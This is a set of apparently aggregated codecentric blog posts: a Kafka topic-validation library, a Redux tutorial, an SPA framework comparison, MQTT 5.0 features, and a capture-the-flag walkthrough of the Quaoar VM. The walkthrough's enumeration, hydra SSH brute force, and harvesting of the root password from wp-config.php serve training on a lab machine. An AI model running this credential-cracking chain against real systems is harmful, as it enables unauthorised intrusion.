If you are in a situation where your application depends on a certain configuration for the Kafka topics you use, it might make sense to fail early when something is not right. You get instant feedback and have a chance to fix the problem. Or you might at least want to emit a warning in your log. In any case, as nice as the AdminClient is, this check is not something you should have to implement yourself in every project.

Thus, the idea for a small library was born. And since naming things is hard, it’s called “Club Topicana”.

With Club Topicana, you can check your topic configuration every time you create a Kafka Producer, Consumer or Streams client.

Expectations can be expressed programmatically or configuratively. Programmatically, it uses a builder:

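As an illustrative sketch only (the class and method names below are assumptions, not necessarily the real Club Topicana API), such a builder call could look roughly like this:

ExpectedTopicConfiguration expected =            // hypothetical class name
    new ExpectedTopicConfigurationBuilder("test_topic")
        .withPartitionCount(32)
        .withReplicationFactor(3)
        .with("cleanup.policy", "delete")
        .with("retention.ms", "30000")
        .build();
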
This basically says “I expect the topic test_topic to exist. It should also have 32 partitions and a replication factor of 3. I also expect the cleanup policy to be delete. Kafka should retain messages for at least 30 seconds.”

Another option to specify an expected configuration is YAML (parser is included):

What do you do with those expectations? The library provides factories for all Kafka clients that mirror their public constructors and additionally expect a collection of expected topic configurations. For example, creating a producer can look like this:

The last line throws a MismatchedTopicConfigException if the actual configuration does not meet expectations. The message of that exception lists the differences. It also provides access to the computed result so users can react to it in any way they want.

The code for consumers and streams clients looks similar. Examples are available on GitHub. If all standard clients are created using Club Topicana, an exception will prevent creation of a client and thus auto creation of a topic. Even if auto creation is disabled, it might be valuable to ensure that topics have the correct configuration.

There is also a Spring client. The @EnableClubTopicana annotation triggers Club Topicana to read YAML configuration and execute the checks. You can configure if you want to just log any mismatches or if you want to let the creation of the application context fail.

This is all on GitHub and available on Maven Central.

Caveats

Club Topicana will not notice when someone changes the configuration of a topic after your application has successfully started. It also of course cannot guard against other clients doing whatever on Kafka.

Summary

The configuration of your Kafka topics is an essential part of running your Kafka applications. Wrong partition count? You might not get the parallelism you need or your streams application might not even start. Wrong replication factor? Data loss is a real possibility. Wrong cleanup policy? You might lose messages that you depend on later. Sometimes, your topics might be auto-generated and come with bad defaults that you have to fix manually. With the AdminClient introduced in Kafka 0.11, it’s simple to write a library that compares actual and desired topic configurations at application startup.

The post Validating Topic Configurations in Apache Kafka appeared first on codecentric AG Blog.

Categories: Agile, Java, TDD & BDD

Penetration Test Training – Quaoar

codecentric Blog - Tue, 05-Dec-17 01:30

For anyone interested in penetration testing and IT security, there is a need to test the theoretical skills you might have acquired. Capture-the-Flag (CTF) images give interested people a means to do so without violating the law. A CTF challenge is (usually) a virtual machine especially crafted with security vulnerabilities in it. The flags are text files that you must discover.
Previously, we solved the LazySysAdmin CTF challenge – today we're using the Quaoar VM from vulnhub.

To get this VM, whether to tag along while reading or to solve it by yourself, download it and import it into VirtualBox. A word of advice: never put a downloaded VM directly into your network. Use a host-only network to reach the virtual machine from your host machine.

But now, let’s get started!
Remember to save anything that looks like it’s a username or could be a password in a file. This information might be useful later on.

The Quaoar-VM is set up to use the network adapter vboxnet0. So as a first step, we need to find it on the network.

$ netdiscover -i vboxnet0
192.168.99.101

As we'll need that IP address a few times, I'll export it to save myself some typing.

$ export IP=192.168.99.101

Now we can use $IP instead of typing it out all the time.

Enumeration

To get a general overview of the target machine, the ports are enumerated with

$ nmap -A $IP

Starting Nmap 7.60 ( https://nmap.org ) at 2017-11-06 21:51 CET
Nmap scan report for 192.168.99.101
Host is up (0.0020s latency).
Not shown: 991 closed ports
PORT    STATE SERVICE     VERSION
22/tcp  open  ssh         OpenSSH 5.9p1 Debian 5ubuntu1 (Ubuntu Linux; protocol 2.0)
[...]
53/tcp  open  domain      ISC BIND 9.8.1-P1
[...]
80/tcp  open  http        Apache httpd 2.2.22 ((Ubuntu))
| http-robots.txt: 1 disallowed entry
|_Hackers
|_http-server-header: Apache/2.2.22 (Ubuntu)
|_http-title: Site doesn't have a title (text/html).
110/tcp open  pop3        Dovecot pop3d
[...]
139/tcp open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
143/tcp open  imap        Dovecot imapd
|_imap-capabilities: LOGINDISABLEDA0001 more IMAP4rev1 listed post-login have SASL-IR ID ENABLE STARTTLS capabilities LITERAL+ Pre-login IDLE OK LOGIN-REFERRALS
| ssl-cert: Subject: commonName=ubuntu/organizationName=Dovecot mail server
[...]
445/tcp open  netbios-ssn Samba smbd 3.6.3 (workgroup: WORKGROUP)
993/tcp open  ssl/imap    Dovecot imapd
|_imap-capabilities: AUTH=PLAINA0001 IMAP4rev1 more post-login have SASL-IR ID ENABLE listed capabilities LITERAL+ Pre-login IDLE OK LOGIN-REFERRALS
| ssl-cert: Subject: commonName=ubuntu/organizationName=Dovecot mail server
[...]
995/tcp open  ssl/pop3    Dovecot pop3d
|_pop3-capabilities: PIPELINING TOP UIDL SASL(PLAIN) USER CAPA RESP-CODES
| ssl-cert: Subject: commonName=ubuntu/organizationName=Dovecot mail server
[...]
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Host script results:
|_clock-skew: mean: 59m57s, deviation: 0s, median: 59m57s
|_nbstat: NetBIOS name: QUAOAR, NetBIOS user: , NetBIOS MAC:  (unknown)
| smb-os-discovery:
|   OS: Unix (Samba 3.6.3)
|   NetBIOS computer name:
|   Workgroup: WORKGROUP\x00
|_  System time: 2017-11-06T16:51:39-05:00
| smb-security-mode:
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
|_smb2-time: Protocol negotiation failed (SMB2)

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 20.02 seconds

So we got to know quite a lot about the system. We have open ports for SSH, HTTP, SMB and POP3 – among others. We also know there is an Apache web server running on port 80 and, according to the robots.txt, there is a WordPress installation.

WordPress

Let’s see what wpscan tells us about that wordpress instance:

$ wpscan --url $IP
_______________________________________________________________
__ _______ _____
\ \ / / __ \ / ____|
\ \ /\ / /| |__) | (___ ___ __ _ _ __ ®
\ \/ \/ / | ___/ \___ \ / __|/ _` | '_ \
\ /\ / | | ____) | (__| (_| | | | |
\/ \/ |_| |_____/ \___|\__,_|_| |_|

WordPress Security Scanner by the WPScan Team
Version 2.9.3
Sponsored by Sucuri - https://sucuri.net
@_WPScan_, @ethicalhack3r, @erwan_lr, pvdl, @_FireFart_
_______________________________________________________________

[+] URL: http://192.168.99.101/wordpress/
[+] Started: Mon Nov 6 21:55:33 2017

[!] The WordPress 'http://192.168.99.101/wordpress/readme.html' file exists exposing a version number
[+] Interesting header: SERVER: Apache/2.2.22 (Ubuntu)
[+] Interesting header: X-POWERED-BY: PHP/5.3.10-1ubuntu3
[+] XML-RPC Interface available under: http://192.168.99.101/wordpress/xmlrpc.php
[!] Upload directory has directory listing enabled: http://192.168.99.101/wordpress/wp-content/uploads/
[!] Includes directory has directory listing enabled: http://192.168.99.101/wordpress/wp-includes/

[+] WordPress version 3.9.14 (Released on 2016-09-07) identified from advanced fingerprinting, meta generator, readme, links opml, stylesheets numbers
[!] 20 vulnerabilities identified from the version number

[!] Title: WordPress 2.9-4.7 - Authenticated Cross-Site scripting (XSS) in update-core.php
Reference: https://wpvulndb.com/vulnerabilities/8716
[...]
[i] Fixed in: 3.9.15

[!] Title: WordPress 3.4-4.7 - Stored Cross-Site Scripting (XSS) via Theme Name fallback
Reference: https://wpvulndb.com/vulnerabilities/8718
[...]
[i] Fixed in: 3.9.15

[!] Title: WordPress <= 4.7 - Post via Email Checks mail.example.com by Default 
Reference: https://wpvulndb.com/vulnerabilities/8719 
[...]
[i] Fixed in: 3.9.15 

[!] Title: WordPress 2.8-4.7 - Accessibility Mode Cross-Site Request Forgery (CSRF) 
Reference: https://wpvulndb.com/vulnerabilities/8720
[...]
[i] Fixed in: 3.9.15 

[!] Title: WordPress 3.0-4.7 - Cryptographically Weak Pseudo-Random Number Generator (PRNG) 
Reference: https://wpvulndb.com/vulnerabilities/8721 
[...]
[i] Fixed in: 3.9.15 

[!] Title: WordPress 3.5-4.7.1 - WP_Query SQL Injection 
Reference: https://wpvulndb.com/vulnerabilities/8730 
[...]
[i] Fixed in: 3.9.16 

[!] Title: WordPress 3.6.0-4.7.2 - Authenticated Cross-Site Scripting (XSS) via Media File Metadata 
Reference: https://wpvulndb.com/vulnerabilities/8765 
[...]
[i] Fixed in: 3.9.17 

[!] Title: WordPress 2.8.1-4.7.2 - Control Characters in Redirect URL Validation 
Reference: https://wpvulndb.com/vulnerabilities/8766 
[...]
[i] Fixed in: 3.9.17 

[!] Title: WordPress 2.3-4.8.3 - Host Header Injection in Password Reset 
Reference: https://wpvulndb.com/vulnerabilities/8807 
[...] 

[!] Title: WordPress 2.7.0-4.7.4 - Insufficient Redirect Validation 
Reference: https://wpvulndb.com/vulnerabilities/8815 
[...]
[i] Fixed in: 3.9.19 

[!] Title: WordPress 2.5.0-4.7.4 - Post Meta Data Values Improper Handling in XML-RPC Reference: https://wpvulndb.com/vulnerabilities/8816 
Reference: https://wordpress.org/news/2017/05/wordpress-4-7-5/ 
[...]
[i] Fixed in: 3.9.19 

[!] Title: WordPress 3.4.0-4.7.4 - XML-RPC Post Meta Data Lack of Capability Checks 
Reference: https://wpvulndb.com/vulnerabilities/8817 
[...]
[i] Fixed in: 3.9.19 

[!] Title: WordPress 2.5.0-4.7.4 - Filesystem Credentials Dialog CSRF 
Reference: https://wpvulndb.com/vulnerabilities/8818 
[...]
[i] Fixed in: 3.9.19 

[!] Title: WordPress 3.3-4.7.4 - Large File Upload Error XSS 
Reference: https://wpvulndb.com/vulnerabilities/8819 
[...]
[i] Fixed in: 3.9.19 

[!] Title: WordPress 3.4.0-4.7.4 - Customizer XSS & CSRF 
Reference: https://wpvulndb.com/vulnerabilities/8820 
[...]
[i] Fixed in: 3.9.19 

[!] Title: WordPress 2.3.0-4.8.1 - $wpdb->prepare() potential SQL Injection
Reference: https://wpvulndb.com/vulnerabilities/8905
[...]
[i] Fixed in: 3.9.20

[!] Title: WordPress 2.3.0-4.7.4 - Authenticated SQL injection
Reference: https://wpvulndb.com/vulnerabilities/8906
[...]
[i] Fixed in: 4.7.5

[!] Title: WordPress 2.9.2-4.8.1 - Open Redirect
Reference: https://wpvulndb.com/vulnerabilities/8910
[...]
[i] Fixed in: 3.9.20

[!] Title: WordPress 3.0-4.8.1 - Path Traversal in Unzipping
Reference: https://wpvulndb.com/vulnerabilities/8911
[...]
[i] Fixed in: 3.9.20

[!] Title: WordPress <= 4.8.2 - $wpdb->prepare() Weakness
Reference: https://wpvulndb.com/vulnerabilities/8941
[...]
[i] Fixed in: 3.9.21

[+] WordPress theme in use: twentyfourteen - v1.1

[+] Name: twentyfourteen - v1.1
| Last updated: 2017-06-08T00:00:00.000Z
| Location: http://192.168.99.101/wordpress/wp-content/themes/twentyfourteen/
[!] The version is out of date, the latest version is 2.0
| Style URL: http://192.168.99.101/wordpress/wp-content/themes/twentyfourteen/style.css
| Referenced style.css: wp-content/themes/twentyfourteen/style.css
| Theme Name: Twenty Fourteen
| Theme URI: http://wordpress.org/themes/twentyfourteen
| Description: In 2014, our default theme lets you create a responsive magazine website with a sleek, modern des...
| Author: the WordPress team
| Author URI: http://wordpress.org/

[+] Enumerating plugins from passive detection ...
[+] No plugins found

[+] Finished: Mon Nov 6 21:55:37 2017
[+] Requests Done: 49
[+] Memory used: 32.5 MB
[+] Elapsed time: 00:00:03

Ok, that's quite a lot of information to process. But before focussing too much on WordPress, we'll stick to enumeration for now. Let's take a look at the Samba shares.

Samba

Enumerate the users first. Luckily, there's an nmap script for that:

$ nmap --script smb-enum-users.nse -p 445 $IP

Starting Nmap 7.60 ( https://nmap.org ) at 2017-11-06 21:58 CET
Nmap scan report for 192.168.99.101
Host is up (0.00089s latency).

PORT STATE SERVICE
445/tcp open microsoft-ds

Host script results:
| smb-enum-users:
| QUAOAR\nobody (RID: 501)
| Full name: nobody
| Description:
| Flags: Normal user account
| QUAOAR\root (RID: 1001)
| Full name: root
| Description:
| Flags: Normal user account
| QUAOAR\viper (RID: 1000)
| Full name: viper
| Description:
| Flags: Normal user account
| QUAOAR\wpadmin (RID: 1002)
| Full name:
| Description:
|_ Flags: Normal user account

Ok. So we see some usernames: nobody, root, viper and wpadmin. We’ll take note of them. Now we can check if there are any shares accessible:

$ nmap --script smb-enum-shares.nse -p 445 $IP

Starting Nmap 7.60 ( https://nmap.org ) at 2017-11-06 22:01 CET
Nmap scan report for 192.168.99.101
Host is up (0.00067s latency).

PORT STATE SERVICE
445/tcp open microsoft-ds

Host script results:
| smb-enum-shares:
| account_used: guest
| \\192.168.99.101\IPC$:
| Type: STYPE_IPC_HIDDEN
| Comment: IPC Service (Quaoar server (Samba, Ubuntu))
| Users: 1
| Max Users:
| Path: C:\tmp
| Anonymous access: READ/WRITE
| Current user access: READ/WRITE
| \\192.168.99.101\print$:
| Type: STYPE_DISKTREE
| Comment: Printer Drivers
| Users: 0
| Max Users:
| Path: C:\var\lib\samba\printers
| Anonymous access:
|_ Current user access:

Nmap done: 1 IP address (1 host up) scanned in 0.71 seconds

This looks like we’re on to something here. A guest share with read/write access! We can now try to connect to that share!

$ smbclient //$IP/IPC$ -N

The prompt changes. Looks like we’re in!

smb: \>

Unfortunately, we can’t do anything on here:

smb: \> dir
NT_STATUS_ACCESS_DENIED listing \*

Let's leave that trace for now. We gathered quite a lot of information already and can try to gain access with it.

Attack

With everything we discovered so far, we're ready to take hydra for a spin and check if we already have valid credentials. Hydra is a login cracker that supports a lot of common protocols. The file info.txt is where I saved everything that looked like a user account or a possible password during enumeration.

$ hydra -L info.txt -P info.txt -u $IP ssh -t 4
[22][ssh] host: 192.168.99.101 login: wpadmin password: wpadmin

Ok, we got our entry point!

$ ssh wpadmin@$IP

Let’s check if we have any interesting groups assigned.

$ id
uid=1001(wpadmin) gid=1001(wpadmin) groups=1001(wpadmin)

Nothing. But we have our first flag.

$ ls
flag.txt
$ cat flag.txt
2bafe61f03117ac66a73c3c514de796e

It's safe to assume the user wpadmin has at least read rights for the WordPress installation. Let's check it out and see if we get some more information!

cd /var/www/wordpress
cat wp-config.php | grep DB_
define('DB_NAME', 'wordpress');
define('DB_USER', 'root');
define('DB_PASSWORD', 'rootpassword!');
define('DB_HOST', 'localhost');
define('DB_CHARSET', 'utf8');
define('DB_COLLATE', '');

Another password, great! Let's see if this is the real root password for this box:

$ ssh root@$IP
root@192.168.99.101's password:
Welcome to Ubuntu 12.04 LTS (GNU/Linux 3.2.0-23-generic-pae i686)

* Documentation: https://help.ubuntu.com/

System information as of Mon Nov 6 18:40:50 EST 2017

System load: 0.47 Processes: 95
Usage of /: 29.9% of 7.21GB Users logged in: 0
Memory usage: 32% IP address for eth0: 192.168.99.101
Swap usage: 0% IP address for virbr0: 192.168.122.1

Graph this data and manage this system at https://landscape.canonical.com/

New release '14.04.5 LTS' available.
Run 'do-release-upgrade' to upgrade to it.

Last login: Sun Jan 15 11:23:45 2017 from desktop-g0lhb7o.snolet.com

OK, let’s see.

root@Quaoar:~# ls
flag.txt vmware-tools-distrib

Now we have the second flag.

root@Quaoar:~# cat flag.txt
8e3f9ec016e3598c5eec11fd3d73f6fb

Learnings

We got it. Time to take a step back and have a look at what we learned during the penetration test of this VM:

  • Enumeration is key. There is a lot of information hidden in plain sight.
  • If you’re running any sort of service, don’t reuse passwords.
  • Disable everything you do not need on your systems.

The post Penetration Test Training – Quaoar appeared first on codecentric AG Blog.

Categories: Agile, Java, TDD & BDD

Developing modern offline apps with ReactJS, Redux and Electron – Part 3 – ReactJS + Redux

codecentric Blog - Sat, 02-Dec-17 23:00

In the last article we introduced you to the core features and concepts of React. We also talked about the possibility to save data in the component state, pass it to child components and access the data inside a child component by using props. In this article we will introduce Redux, which solves the problem of storing your application state.

 

  1. Introduction
  2. ReactJS
  3. ReactJS + Redux
  4. Electron framework
  5. ES5 vs. ES6 vs. TypeScript
  6. WebPack
  7. Build, test and release process

Once a component needs to share state with another component that it does not have a parent-child relationship with, things start to get complicated. The following diagram visualizes that problem. On the left-hand side, you see a tree of React components. Once a component initiates a state change, this change needs to be propagated to all other components that rely on the changed data.

This is where Redux comes in handy. Redux is a predictable state container for JavaScript apps. The state is kept in one store and components listen to the data in the store that they are interested in.

Flux pattern

Redux implements the Flux pattern that manages the data flow in your application. The view components subscribe to the store and react to changes. Components can dispatch actions that describe what should happen. The reducers receive these actions and update the store. A detailed explanation of the four parts of the Flux pattern in Redux is given in the next sections.

Redux

The Redux state stores the whole application data in one object tree that is accessible from every component of the application. In our example the state contains a small JavaScript object, as you can see in the following code snippet.

const state = {
  isModalOpen: false,
  clipboard: {
    commands: []
  } 
}

The state is immutable and the only way to change it is to dispatch an action.

Action

Actions are plain JavaScript objects consisting of a mandatory type property to identify the action and optional additional information. The type should be a string constant that is stored in a separate module for clarity. There are no naming specifications for the implementation of the object with the additional information. The following example action sets the value of isModalOpen to false.

actionConstants.js
const SET_MODAL_OPEN = 'SET_MODAL_OPEN';
modalAction.js
{
  type: SET_MODAL_OPEN,
  payload: false
}

Alternatively you can use an action creator to create the action. Action creators make actions more flexible and easier to test. In our example we use one action creator to set the isModalOpen variable to false or true.

function setModalOpen(isModalOpen) {
  return {
    type: SET_MODAL_OPEN,
    payload: isModalOpen
  };
}

The question remains how to trigger the action. Answer: simply pass the action to the dispatch() function.

dispatch(setModalOpen(false));

Alternatively you can use a bound action creator that dispatches the action automatically when you call the function. Here is an example for that use case:

Bound Action Creator
const openModal = () => dispatch(setModalOpen(true));

So far we can dispatch an action that indicates that the state has to change, but still the state did not change. To do that we need a reducer.

Reducer

“Reducers are just pure functions that take the previous state and an action, and return the next state.” [REDUCER]

The reducer contains a switch statement with a case for each action and a default case which returns the actual state. It is important to note that the Redux state is immutable, so you have to create a copy of the state that will be modified. In our projects we use the object spread operator proposal, but you can also use Object.assign(). The following example sets isModalOpen to the value of the action payload and keeps the other state values.

Object spread operator:

function modal(state, action) {
  switch (action.type) {
    case SET_MODAL_OPEN:
      return {
        ...state,
        isModalOpen: action.payload
      };
    default:
      return state;
  }
}

Object.assign():

function modal(state, action) {
  switch (action.type) {
    case SET_MODAL_OPEN:
      return Object.assign({}, state, {
        isModalOpen: action.payload
      });
    default:
      return state;
  }
}

The reducer either takes the previous state, if one exists, or the optional initial state that defines defaults for the store properties. In our example we configure that the modal should be closed initially.

const initialState = {
  isModalOpen: false
};

function modal(state = initialState, action) {
  switch (action.type) {
    case SET_MODAL_OPEN:
      return {
        ...state,
        isModalOpen: action.payload
      };
    default:
      return state;
  }
}

The number of reducers can become very large, thus it is recommended to split the reducers into separate files, keep them independent and use combineReducers() to turn all reducing functions into one, which is necessary for the store creation.

Store

We have already talked a lot about the store, but we have not looked at how to create it. Redux provides a function called createStore() which takes the reducer function and optionally the initial state as arguments. The following code snippets show how to combine multiple reducers before creating the store.

One reducer
import { createStore } from 'redux';

const initialState = {
  isModalOpen: false,
  clipboard: {
    commands: []
  } 
};

let store = createStore(modalReducer, initialState);
Two combined reducers
import { createStore, combineReducers } from 'redux'; 

const initialState = {
  isModalOpen: false,
  clipboard: {
    commands: []
  } 
};

const reducer = combineReducers({
  clipboardReducer,
  modalReducer
});

let store = createStore(reducer, initialState);

Usage with React

We showed how to create and manipulate the store, but we did not talk about how a component accesses the store. The component can use store.subscribe() to read objects of the state tree, but we suggest using the React Redux function connect(), which prevents unnecessary re-renders.

The function connect() expects two functions as arguments, called mapStateToProps and mapDispatchToProps. You can apply connect() either with a decorator or by wrapping the component manually; decorators are part of ES7, which we cover in blog article 5 on “ES5 vs. ES6 vs. TypeScript”.

With a decorator (ES7):

@connect(mapStateToProps, mapDispatchToProps)
class App extends React.Component {
  render() {
    return (
      <div>
        Count: {this.props.counter}
      </div>
    );
  }
}

Without a decorator:

class App extends React.Component {
  render() {
    return (
      <div>
        Count: {this.props.counter}
      </div>
    );
  }
}

export default connect(
  mapStateToProps,
  mapDispatchToProps)(App);

mapDispatchToProps defines which actions you want to be able to trigger inside your component. For example, we want a prop called onSetModalOpen to be injected into the Modal component, which dispatches the SET_MODAL_OPEN action. If the action creator arguments match the callback property arguments, you can use a shorthand notation.

mapDispatchToProps:

const mapDispatchToProps = dispatch => ({
  onSetModalOpen(value) {
    dispatch(setModalOpen(value));
  }
});

connect(mapStateToProps, mapDispatchToProps)(App);

Shorthand notation:

connect(
  mapStateToProps,
  {onSetModalOpen: setModalOpen}
)(App);



mapStateToProps defines how to convert the state to the props you need inside your component.

const mapStateToProps = state => ({
  isModalOpen: state.modal.isModalOpen,
  clipboard:   state.clipboard    
});

To handle the growing complexity of the store as you write business applications, we recommend using selectors, which are functions that know how to extract a specific piece of data from the store. In our small example selectors do not offer much benefit.

Selectors:

const getModal = (state) => {
  return state.modal;
};

const getIsModalOpen = (state) => {
  return getModal(state).isModalOpen;
};

mapStateToProps:

const mapStateToProps = state => ({
  isModalOpen: getIsModalOpen(state),
  clipboard:   getClipboard(state)
});



Debugging using the Console Logger

Redux provides a predictable and transparent state that only changes after dispatching an action. To isolate errors in your application state you can use a middleware like redux-logger instead of manually adding console logs to your code. The following code snippet shows how to configure the default redux logger.

import { applyMiddleware, createStore } from 'redux';
import { logger } from 'redux-logger';
const store = createStore(
  reducer,
  applyMiddleware(logger)
);

When running your React application the redux logger will print the actions to your browser console. By default you see the action name and you can collapse each action to see more details.


In the details view the redux logger shows the previous state of the Redux store, then the action with the payload you triggered, and after that the next state containing the new values.

 

Redux logger provides various configuration options. You can specify which entries should be collapsed by default, or which actions should not be logged to the console, just to name a few.

import { applyMiddleware, createStore } from 'redux';
import { createLogger } from 'redux-logger';

const logger = createLogger({
  collapsed: (getState, action, logEntry) => !logEntry.error,
  predicate: (getState, action) =>
    action && action.type !== 'SET_LINES'
});

const store = createStore(
  reducer,
  applyMiddleware(logger)
);

Summary

In this article we showed how useful Redux is to manage the state of applications. The simple Flux pattern scales extremely well, even for large applications, and we have not run into any critical performance issues in our projects so far. In the next article we will introduce Electron and show how to package our React/Redux web app as a cross-platform desktop application. Stay tuned!

Categories: Agile, Java, TDD & BDD

Angular – bane of my SPA?

codecentric Blog - Fri, 01-Dec-17 03:45

When it comes to SPAs (Single Page Applications), very often you hear “Angular” in the same or the following sentence. Due to my projects, I worked with a couple of other frameworks for SPAs this year. Here’s what I learned about those frameworks and how they differ.

Angular

The Angular family is mainly developed and maintained by Google. They are very popular, if not the most popular, frameworks for Single Page Applications. Angular has been on the market for quite a few years. It has undergone several minor and major changes in its history. Angular versions up to, but not including, 2.0 are referred to as AngularJS, while newer versions are plainly called Angular.

One of the more interesting changes in AngularJS came in version 1.5 with the introduction of the component model. Components are custom HTML tags with arbitrary content. Before version 1.5 you would’ve used AngularJS directives to achieve the same functionality. The component model unified the way components are built and how they interact with other components. Last but not least, the introduction of the component model was a step towards the mindset of Angular 2, where components behave similarly. Therefore, using components held the promise of making the migration to Angular 2 easier.

Angular version 2 (or newer) is a redevelopment using TypeScript, a superset of JavaScript. TypeScript brings type safety and lots of improvements for object-oriented programming to the table. Using these features, the new Angular encapsulates more functionality into classes instead of arbitrary JavaScript code. Due to the feature richness of AngularJS and Angular the frameworks are quite heavy. Very few projects will ever use Angular to its full potential.

The module system of Angular is interesting for enterprise size applications. With it you can define reusable bundles of multiple components, directives and/or services.

Aurelia

Aurelia is a lighter alternative to Angular. The main contributor and maintainer is Rob Eisenberg, who is a senior employee at Microsoft. Being a Microsoft employee shouldn’t have much of an impact on the development of the framework. However Microsoft’s endorsement of the framework lets one hope that the framework will have an extended support lifespan. Aurelia uses convention over configuration, which allows a very quick start with your development.

What makes Aurelia special is that you write very clean JavaScript code. The binding between template and controller class methods and fields works out of the box via naming convention. To make this magic happen, the only caveat is that your controller and template files must have the same filename and should be in the same directory. Aurelia is light and concentrates on ease of use. This is achieved by using easy-to-understand conventions. Everything that exceeds the functionality of Aurelia can be added via the thousands of libraries from the NPM (Node Package Manager) repository. By using this approach, your SPA only contains the functionality you manually add, which keeps your webapp nicely slim.

Vue

Vue is another candidate for lightweight Single Page Application frameworks. The binding between template and controller is semantically reminiscent of Angular, which helps you get used to Vue when you come from an Angular background. A speciality of Vue is that you can put template, controller and styles into the same, so-called ‘.vue’ file. This helps reduce the mess that comes with having styles, controllers and templates in different files and directories. To enable this in a meaningful way, vue files contain up to three default sections. When you write an extension for the pre-processor, you can even add more sections, e.g. for translations, in the same file.
Vue, like Aurelia, is easy to set up and allows you to be productive very fast. Like Aurelia, it doesn’t come with a lot of extra features that are not UI related. Add those from the NPM repository as you need them.

React

React is developed by Facebook and has a history of license disputes. The main issue with the license was that Facebook reserved a right over its intellectual property, which could in a conflict situation allow Facebook to revoke/suspend the open source nature of React. Facebook has since resolved the license issues by re-licensing several libraries, including react, under a standard MIT license in September 2017.

React alone is not an SPA framework. React’s primary concern is to push JavaScript changes from the code behind to the browser without reloading the page. To have state changes propagate from the browser to the code behind, the Redux framework has proven to be the community’s choice. React uses JSX, which allows putting HTML tags and dynamic content right inside your JavaScript code. React’s focus is building the view layer with its component system. For features that other frameworks offer out of the box, e.g. data binding, you have to bundle other libraries. This gives you more flexibility, but decisions must be made, which is not easy when starting with a new technology.

Conclusion

All of the frameworks discussed above have their purposes. There is no such thing as THE best Single Page Application framework because your choice should consider the strengths and weaknesses of each of these frameworks.
If you want to squeeze the last bit of performance out of your app and you want control over what is happening and when, you should go for React. For a quick and uncomplicated start, you can rely on Aurelia and Vue. Both don’t add as much boilerplate as Angular while still taking care of everything that makes web front end development difficult. When you know that your application is going to be big and you’ll need lots of functionality, Angular could be the right choice for you.

AngularJS is still a viable option for smaller apps, but for serious business apps you should go with Angular 5 and TypeScript. Just be aware of the steep learning curve that the two will impose on your team. Generally speaking, bigger applications can profit from the added complexity of TypeScript. It is, however, difficult to decide at what point JavaScript adds more maintenance cost than TypeScript would have added to the initial development.
Flow offers a lighter alternative to TypeScript if you don’t want to break a fly on a wheel. Flow will give you type safety within the “normal” JavaScript syntax.

Disclosure

With the exception of AngularJS and Vue, I have no more than a few weeks of experience with the frameworks introduced above. I still wanted to share my insights into them. When it comes to Vue or Aurelia, my personal preference is Vue. I tried both with a very simple test component. My project had unit and end-to-end tests to allow for test-driven development. To allow my tests to run with Aurelia I first had to modify the Aurelia test classes. I’ve been happy with Vue ever since I started using it at the beginning of this year.

Still undecided? There’s an in-depth article series on sitepen.com that concludes with a summary here.

What are your experiences with the frameworks mentioned above? Are there any other frameworks you recommend to take a look at? Please let me know.

More resources / ecosystem compilations for the frameworks

https://github.com/AngularClass/awesome-angular
https://curated.vuejs.org/
https://github.com/vuejs/awesome-vue
https://github.com/behzad888/awesome-aurelia
https://github.com/chentsulin/awesome-react

The post Angular – bane of my SPA? appeared first on codecentric AG Blog.

Categories: Agile, Java, TDD & BDD

Hello MQTT Version 5.0!

codecentric Blog - Thu, 30-Nov-17 13:28

On August 9, 2017, the OASIS MQTT Technical Committee announced that MQTT Version 5.0 is now available for public review and comment until September 8th. The release of the next version of Message Queue Telemetry Transport (MQTT) is expected by the end of this year.

Time to have a closer look at what’s new.

MQTT v5.0 is the successor of MQTT 3.1.1 (find out why it’s not MQTT 4).

Probably most important: MQTT v5.0 is not backward compatible (like v3.1.1 before it). Too many new things are introduced, so existing implementations have to be revisited.

According to the specification, MQTT v5.0 adds a significant number of new features to MQTT while keeping much of the core in place.

The major functional objectives are:

  • Enhancements for scalability and large-scale systems with respect to setups with thousands to millions of devices
  • Improved error reporting (Reason Code & Reason String)
  • Formalize common patterns including capability discovery and request response
  • Extensibility mechanisms including user properties, payload format and content type
  • Performance improvements and improved support for small clients

My MQTT v5.0 Highlights

User Properties

User properties (UTF-8 encoded strings) can be part of most MQTT packets: PUBLISH and CONNECT, and all packets with a Reason Code.
User properties on PUBLISH are forwarded with the message and are defined by the client applications. They are forwarded by the server to the receiver of the message.
User properties on CONNECT and ACKs are defined by the sender, are unique to the sender implementation, and are not defined by MQTT.
An unlimited number of user properties can be added!

Payload Format Indicator & Content Type 

Another identifier/value pair is available for use when sending a PUBLISH message. This is the Payload Format indicator. If present and set to 1, this indicates that the PUBLISH payload is UTF-8 encoded data. If set to 0, or if the indicator is not present, then the payload is an unspecified byte format, exactly as with MQTT v3.1.1.

  • Optional part of PUBLISH message
  • Reason Codes for ACK messages available if payload format is invalid
  • Receiver may validate the format indicator
  • "Content Type" optional header can carry a MIME type
  • "Payload Format Indicator" can be binary or UTF-8

Shared Subscriptions

With support of shared subscriptions, Client Load Balancing is now included in MQTT. The message load of a single topic is distributed amongst all subscribers (this was already supported by HiveMQ for MQTT 3.1 & MQTT 3.1.1).

MQTT Shared Subscriptions

A Shared Subscription is identified using a special style of Topic Filter.

The format of this filter is:

$share/{ShareName}/{filter} 

$share – is a literal string that marks the Topic Filter as being a Shared Subscription Topic
{ShareName} – is a character string that does not include “/”, “+” or “#”
{filter} – is the remainder of the string, which has the same syntax and semantics as a Topic Filter in a non-shared subscription.

Reason Codes & Reason Strings

With MQTT v5.0, Reason Codes and Reason Strings are introduced at application level. Now clients are allowed to figure out why they were disconnected.
Almost all control packets like CONNACK, PUBACK, PUBREC, PUBREL, UNSUBACK, DISCONNECT, SUBACK and AUTH can carry Reason Codes in their variable header.
But: Reason Codes are optional, the server/broker can still decide to just disconnect or reject the clients like in MQTT v3.1.1, e.g. for security reasons.
In addition to the Reason Code a Reason String can be associated with the response to provide a more human readable message.

Session management: Session Expiry & Message Expiry

Support of offline/persistent sessions is a major feature of MQTT to handle connection interrupts. The specification of MQTT v3.1.1 does not define a mechanism to control the expiry of a persistent session. Thus it will never expire and never be deleted (aside from some brokers like HiveMQ, which already support session expiry with MQTT v3.1.1).
